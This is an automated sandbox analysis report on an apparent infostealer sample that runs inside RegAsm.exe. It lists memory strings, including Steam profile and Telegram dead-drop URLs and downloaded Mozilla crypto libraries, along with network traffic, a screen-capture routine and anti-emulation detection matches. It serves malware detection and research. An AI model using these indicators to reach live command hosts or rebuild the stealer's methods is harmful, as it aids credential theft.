                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/he
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.j
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.dr | String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.dr | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: JEGHDA.3.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: JEGHDA.3.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: JEGHDA.3.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://help.steampowered.com/en/
                  Source: IIDHJD.3.dr | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr | String found in binary or memory: https://mozilla.org0/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.co
                  Source: 76561199686524322[1].htm.3.dr | String found in binary or memory: https://steamcommunity.com/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://steamcommunity.com/discussions/
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/login
                  Source: 76561199686524322[1].htm.3.dr | String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199686524322
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://steamcommunity.com/market/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://steamcommunity.com/my/wishlist/
                  Source: file.exe, 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199686524322
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199686524322/badges
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199686524322/inventory/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/workshop/
                  Source: 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/
                  Source: 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/about/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/explore/
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/legal/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/mobile
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/news/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/points/shop/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/stats/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                  Source: GCBFBG.3.drString found in binary or memory: https://support.mozilla.org
                  Source: GCBFBG.3.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: GCBFBG.3.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp, GDAAKF.3.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: GDAAKF.3.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp, GDAAKF.3.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: GDAAKF.3.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                  Source: file.exe, 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/k0mono
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: JEGHDA.3.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                  Source: JEGHDA.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownHTTPS traffic detected: 23.194.234.100:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004112FD _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

                  System Summary

                  Source: 0.2.file.exe.70aac0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 0.2.file.exe.70aac0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 0.2.file.exe.6e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6EED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C72B8C0 rand_s,NtQueryVirtualMemory,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C72B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C72B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F736A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041C07A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041E190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041BB29
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041CCA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6C35A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C705C10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C712C10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73AC00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C706CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6D6C80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6DFD00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6EED10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C700DD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C736E63
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C703E50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E9E50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C712E4E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C729E30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C707E10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6CBEF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6DFEF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C724EA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E5E90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6D9F00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6CDFE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6F6FF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E8850
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6ED850
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C70B820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C714820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6D7810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7058E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C71B970
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6DD960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6EA940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6CC9A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6FD9B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C722990
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C709A60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E1AF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C708AC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C732AB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6F4AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6DCAB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73BA90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6D5440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73545C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73542B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6CD4E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6D64C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6ED4D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7234A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C72C4A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6F0512
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7285F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6CC670
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E4640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C715600
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7376E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C72E680
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C707710
